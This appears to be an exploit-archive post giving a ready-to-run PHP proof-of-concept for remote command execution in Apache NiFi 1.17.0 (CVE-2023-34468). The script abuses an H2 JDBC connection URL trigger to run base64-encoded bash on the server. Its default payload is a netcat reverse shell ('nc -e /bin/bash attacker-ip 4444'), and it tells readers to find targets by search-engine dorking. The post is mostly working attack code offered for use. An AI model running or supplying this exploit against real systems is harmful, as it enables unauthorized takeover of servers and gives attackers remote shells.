=============================================================================================================================================
| # Title     : Apache NiFi 1.17.0 RCE Vulnerability                                                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://nifi.apache.org/                                                                                                    |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  exploit remote command execution vulnerability in Apache NiFi

   (Related : https://packetstorm.news/files/id/174398/ Related CVE numbers: CVE-2023-34468 ) .
	
[+] save code as poc.php.

[+] Set TArget : line 61 + 62

[+] PayLoad :

<?php
// سكربت لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Apache NiFi

class ApacheNiFiExploit {
    private $target;
    private $token;

    public function __construct($target, $token = null) {
        $this->target = rtrim($target, '/');
        $this->token = $token;
    }

    private function sendRequest($endpoint, $method = 'GET', $data = null) {
        $url = "$this->target/$endpoint";
        $ch = curl_init($url);
        
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        
        if ($this->token) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Authorization: Bearer $this->token"]);
        }
        
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
            curl_setopt($ch, CURLOPT_HTTPHEADER, array_merge([
                'Content-Type: application/json'
            ], $this->token ? ["Authorization: Bearer $this->token"] : []));
        }

        $response = curl_exec($ch);
        curl_close($ch);
        return json_decode($response, true);
    }

    public function exploit($payload) {
        $b64_payload = base64_encode($payload);
        $db_name = bin2hex(random_bytes(4));
        $trigger_name = strtoupper(bin2hex(random_bytes(4)));
        
        $db_config = [
            'component' => [
                'name' => 'ExploitDBPool',
                'properties' => [
                    'Database Connection URL' => "jdbc:h2:file:/tmp/$db_name.db;CREATE TRIGGER $trigger_name BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,$b64_payload}|{base64,-d}|{bash,-i}')\n$$--=x",
                    'Database Driver Class Name' => 'org.h2.Driver'
                ]
            ]
        ];
        
        $response = $this->sendRequest('nifi-api/controller-services', 'POST', $db_config);
        
        if (isset($response['component']['id'])) {
            echo "[+] تم إنشاء واستغلال خدمة الاتصال بقاعدة البيانات بنجاح!";
        } else {
            echo "[-] فشل في تنفيذ الهجوم.";
        }
    }
}

$target = 'https://target-nifi-instance.com';
$token = 'YOUR_BEARER_TOKEN'; // إذا كانت المصادقة مطلوبة
$exploit = new ApacheNiFiExploit($target, $token);
$exploit->exploit('nc -e /bin/bash attacker-ip 4444');







Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================